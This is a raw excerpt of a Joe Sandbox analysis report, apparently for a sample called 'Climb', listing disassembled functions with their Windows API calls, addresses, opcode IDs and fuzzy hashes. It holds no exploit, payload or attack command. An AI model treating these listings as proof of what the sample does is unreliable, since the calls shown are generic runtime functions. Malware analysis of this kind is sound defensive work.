                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0011E328
                                                                                                                                                                          • LoadStringW.USER32(00000000), ref: 0011E32F
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0011E345
                                                                                                                                                                          • LoadStringW.USER32(00000000), ref: 0011E34C
                                                                                                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0011E390
                                                                                                                                                                          Strings
                                                                                                                                                                          • %s (%d) : ==> %s: %s %s, xrefs: 0011E36D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleLoadModuleString$Message
                                                                                                                                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                          • API String ID: 4072794657-3128320259
                                                                                                                                                                          • Opcode ID: a2df5b7b3548bb406092d2a9f8ee531697b2287959f990faed07426fdc419e54
                                                                                                                                                                          • Instruction ID: 18b49eb581feab17dd91478721f13fa77803a739cac42b2d833790136a5a0a7b
                                                                                                                                                                          • Opcode Fuzzy Hash: a2df5b7b3548bb406092d2a9f8ee531697b2287959f990faed07426fdc419e54
                                                                                                                                                                          • Instruction Fuzzy Hash: 910186F69002087FEB1197E4AD89EE7777CDB09700F4145A5BB0AE6051E7749EC48B71
                                                                                                                                                                          APIs
                                                                                                                                                                          • InterlockedExchange.KERNEL32(?,?), ref: 00121322
                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000000,?), ref: 00121334
                                                                                                                                                                          • TerminateThread.KERNEL32(00000000,000001F6), ref: 00121342
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00121350
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0012135F
                                                                                                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0012136F
                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000000), ref: 00121376
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3495660284-0
                                                                                                                                                                          • Opcode ID: ed635ddc60f4b793baa42e455baa93f140d2779f3be13ab0231071bc4f314c8c
                                                                                                                                                                          • Instruction ID: c26de76b121c7ce45ebc0ecb08ab4ec96a5c1e6d11292c21a6f284f157b241d7
                                                                                                                                                                          • Opcode Fuzzy Hash: ed635ddc60f4b793baa42e455baa93f140d2779f3be13ab0231071bc4f314c8c
                                                                                                                                                                          • Instruction Fuzzy Hash: A5F0C936142612BBDB555F54FE49BD6BB3ABF06712F401121F10695CB087B494B1CF90
                                                                                                                                                                          APIs
                                                                                                                                                                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 0013281D
                                                                                                                                                                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0013283E
                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 0013284F
                                                                                                                                                                          • htons.WSOCK32(?,?,?,?,?), ref: 00132938
                                                                                                                                                                          • inet_ntoa.WSOCK32(?), ref: 001328E9
                                                                                                                                                                            • Part of subcall function 0011433E: _strlen.LIBCMT ref: 00114348
                                                                                                                                                                            • Part of subcall function 00133C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0012F669), ref: 00133C9D
                                                                                                                                                                          • _strlen.LIBCMT ref: 00132992
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3203458085-0
                                                                                                                                                                          • Opcode ID: 1707c302969a88cfffd161cf6877baa9cce9121fddb378fc387158b46a76f777
                                                                                                                                                                          • Instruction ID: 0f8c5e8072f2faded0440d9551a87bb871ed238747c57abeaef1c3dd290d81de
                                                                                                                                                                          • Opcode Fuzzy Hash: 1707c302969a88cfffd161cf6877baa9cce9121fddb378fc387158b46a76f777
                                                                                                                                                                          • Instruction Fuzzy Hash: 21B11235604300AFD324EF24C885FAABBE5AF95318F54854CF49A4B2A3DB71ED42CB91
                                                                                                                                                                          APIs
                                                                                                                                                                          • __allrem.LIBCMT ref: 000E042A
                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000E0446
                                                                                                                                                                          • __allrem.LIBCMT ref: 000E045D
                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000E047B
                                                                                                                                                                          • __allrem.LIBCMT ref: 000E0492
                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000E04B0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1992179935-0
                                                                                                                                                                          • Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                          • Instruction ID: 99f17304af5bffe2537daddb1be4891876fea1e9b10c28fc48461ceff33552ec
                                                                                                                                                                          • Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                          • Instruction Fuzzy Hash: 8481D8B26017869FE7209E7ACC41BAF73E9AF44724F24412AF511F76C2E7B0DA818754
                                                                                                                                                                          APIs
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,000D8649,000D8649,?,?,?,000E67C2,00000001,00000001,8BE85006), ref: 000E65CB
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,000E67C2,00000001,00000001,8BE85006,?,?,?), ref: 000E6651
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 000E674B
                                                                                                                                                                          • __freea.LIBCMT ref: 000E6758
                                                                                                                                                                            • Part of subcall function 000E3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,000D6A79,?,0000015D,?,?,?,?,000D85B0,000000FF,00000000,?,?), ref: 000E3BC5
                                                                                                                                                                          • __freea.LIBCMT ref: 000E6761
                                                                                                                                                                          • __freea.LIBCMT ref: 000E6786
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1414292761-0
                                                                                                                                                                          • Opcode ID: 2c2c8c5228b61ff29e7f93b1f7bfb6ac70615047d449fb52d18e07ebeeb62bad
                                                                                                                                                                          • Instruction ID: 8474c2701575e333e366bfbfd7c1f1bc660f834f8b0a0e9109e0d137cdf6fcbf
                                                                                                                                                                          • Opcode Fuzzy Hash: 2c2c8c5228b61ff29e7f93b1f7bfb6ac70615047d449fb52d18e07ebeeb62bad
                                                                                                                                                                          • Instruction Fuzzy Hash: 72512572610286AFDB248F62EC85EBF7BE9EF50794F140229FC55E7140EB36DC4086A0
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000BB329: _wcslen.LIBCMT ref: 000BB333
                                                                                                                                                                            • Part of subcall function 0013D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0013C10E,?,?), ref: 0013D415
                                                                                                                                                                            • Part of subcall function 0013D3F8: _wcslen.LIBCMT ref: 0013D451
                                                                                                                                                                            • Part of subcall function 0013D3F8: _wcslen.LIBCMT ref: 0013D4C8
                                                                                                                                                                            • Part of subcall function 0013D3F8: _wcslen.LIBCMT ref: 0013D4FE
                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0013C72A
                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0013C785
                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0013C7CA
                                                                                                                                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0013C7F9
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0013C853
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0013C85F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1120388591-0
                                                                                                                                                                          • Opcode ID: dbe09a31cdd11284581c48b32d40f1d67a25ef48c63c3a9d13777897439fe325
                                                                                                                                                                          • Instruction ID: b91a03ea004af0ebcd393592b8d07ba1e08e9584417119ef87f2fc2d96df48d4
                                                                                                                                                                          • Opcode Fuzzy Hash: dbe09a31cdd11284581c48b32d40f1d67a25ef48c63c3a9d13777897439fe325
                                                                                                                                                                          • Instruction Fuzzy Hash: 2F819D75208341AFD714DF24C885E6ABBE5FF84308F14859CF4995B2A2DB32ED46CB92
                                                                                                                                                                          APIs
                                                                                                                                                                          • VariantInit.OLEAUT32(00000035), ref: 001100A9
                                                                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 00110150
                                                                                                                                                                          • VariantCopy.OLEAUT32(00110354,00000000), ref: 00110179
                                                                                                                                                                          • VariantClear.OLEAUT32(00110354), ref: 0011019D
                                                                                                                                                                          • VariantCopy.OLEAUT32(00110354,00000000), ref: 001101A1
                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 001101AB
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3859894641-0
                                                                                                                                                                          • Opcode ID: c635ab800096e2933b3f083a7c069d27574fe63f292cb2f6a7a47e1a228667cc
                                                                                                                                                                          • Instruction ID: 3e002b95952a65962a0fa56719d3c6bf29712868038188e3b62f99a1cf6f1ee3
                                                                                                                                                                          • Opcode Fuzzy Hash: c635ab800096e2933b3f083a7c069d27574fe63f292cb2f6a7a47e1a228667cc
                                                                                                                                                                          • Instruction Fuzzy Hash: 3451DB35A00320A7DF19AB649889BA973A5EF5E350F148467F805DF296EBB09CC0C756
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000B41EA: _wcslen.LIBCMT ref: 000B41EF
                                                                                                                                                                            • Part of subcall function 000B8577: _wcslen.LIBCMT ref: 000B858A
                                                                                                                                                                          • GetOpenFileNameW.COMDLG32(00000058), ref: 00129F2A
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00129F4B
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00129F72
                                                                                                                                                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00129FCA
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$FileName$OpenSave
                                                                                                                                                                          • String ID: X
                                                                                                                                                                          • API String ID: 83654149-3081909835
                                                                                                                                                                          • Opcode ID: 7589a5bb98b03e734cd5c6e7c76e728219a90152c392ce7ed5097d099fea0d4d
                                                                                                                                                                          • Instruction ID: 6949ca2266b69f0256aa098f86ab4836016c9ffdda07589e9c504cbea8288a00
                                                                                                                                                                          • Opcode Fuzzy Hash: 7589a5bb98b03e734cd5c6e7c76e728219a90152c392ce7ed5097d099fea0d4d
                                                                                                                                                                          • Instruction Fuzzy Hash: 83E181316043509FD724DF28D881AAAB7E4FF85314F04896DF8899B3A2DB31ED55CB92
                                                                                                                                                                          APIs
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00126F21
                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 0012707E
                                                                                                                                                                          • CoCreateInstance.OLE32(00150CC4,00000000,00000001,00150B34,?), ref: 00127095
                                                                                                                                                                          • CoUninitialize.OLE32 ref: 00127319
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                          • String ID: .lnk
                                                                                                                                                                          • API String ID: 886957087-24824748
                                                                                                                                                                          • Opcode ID: 4127e433e759dad572d6b0a6488982f471f8f6f43d661c91b9110ee56731588e
                                                                                                                                                                          • Instruction ID: a740f98b0c0a0901de8b016698da351a59414aef69a5152e18196b3b3fe7efb3
                                                                                                                                                                          • Opcode Fuzzy Hash: 4127e433e759dad572d6b0a6488982f471f8f6f43d661c91b9110ee56731588e
                                                                                                                                                                          • Instruction Fuzzy Hash: BDD15971608211AFC300EF24D881DABB7E8FF99704F40496DF5959B2A2DB71ED49CB92
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000B249F: GetWindowLongW.USER32(00000000,000000EB), ref: 000B24B0
                                                                                                                                                                          • BeginPaint.USER32(?,?,?), ref: 000B1B35
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 000B1B99
                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 000B1BB6
                                                                                                                                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 000B1BC7
                                                                                                                                                                          • EndPaint.USER32(?,?,?,?,?), ref: 000B1C15
                                                                                                                                                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 000F3287
                                                                                                                                                                            • Part of subcall function 000B1C2D: BeginPath.GDI32(00000000), ref: 000B1C4B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3050599898-0
                                                                                                                                                                          • Opcode ID: 20efb2451bce2bafeb82d669d7a6a6553179568258335147ada9a5445ada29c0
                                                                                                                                                                          • Instruction ID: 8653f821a4d8f80810bd83620b96d83ed03d38096f8240ef413077d13d50d848
                                                                                                                                                                          • Opcode Fuzzy Hash: 20efb2451bce2bafeb82d669d7a6a6553179568258335147ada9a5445ada29c0
                                                                                                                                                                          • Instruction Fuzzy Hash: D441B070604305AFCB21DF24DC95FFA7BE8EB4A334F140669FA65865B2C7309984DB62
                                                                                                                                                                          APIs
                                                                                                                                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 001211B3
                                                                                                                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 001211EE
                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0012120A
                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00121283
                                                                                                                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0012129A
                                                                                                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 001212C8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3368777196-0
                                                                                                                                                                          • Opcode ID: 01a846873c79b631a182b4d7a0e26a50bd6d9b686cceeeeac4ec910c2fe961d3
                                                                                                                                                                          • Instruction ID: 537327ec695ee45ec4fab111d172880e84c6c85efa782697f0588ac55a32a6a1
                                                                                                                                                                          • Opcode Fuzzy Hash: 01a846873c79b631a182b4d7a0e26a50bd6d9b686cceeeeac4ec910c2fe961d3
                                                                                                                                                                          • Instruction Fuzzy Hash: 7C416D75900215EFDF04DF54EC85AAAB7B8FF44310F1480A5FD049A296DB30DEA1DBA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0010FBEF,00000000,?,?,00000000,?,000F39E2,00000004,00000000,00000000), ref: 00148CA7
                                                                                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00148CCD
                                                                                                                                                                          • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00148D2C
                                                                                                                                                                          • ShowWindow.USER32(00000000,00000004), ref: 00148D40
                                                                                                                                                                          • EnableWindow.USER32(00000000,00000001), ref: 00148D66
                                                                                                                                                                          • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00148D8A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 642888154-0
                                                                                                                                                                          • Opcode ID: 65ab50aeed5d4ef44dd7dde7952d6fb37338c736e0a1d5631b23840f61604747
                                                                                                                                                                          • Instruction ID: 735762f87ac47d97540a37357e30bc615d7f65aa182e5fcba83f87e6beae133a
                                                                                                                                                                          • Opcode Fuzzy Hash: 65ab50aeed5d4ef44dd7dde7952d6fb37338c736e0a1d5631b23840f61604747
                                                                                                                                                                          • Instruction Fuzzy Hash: A141EB34A02254AFDB26DF24D9C5FE97BF1FB45308F1440A9F5085B6B2CB356886CB50
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetForegroundWindow.USER32(?,?,00000000), ref: 00132D45
                                                                                                                                                                            • Part of subcall function 0012EF33: GetWindowRect.USER32(?,?), ref: 0012EF4B
                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 00132D6F
                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 00132D76
                                                                                                                                                                          • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00132DB2
                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00132DDE
                                                                                                                                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00132E3C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
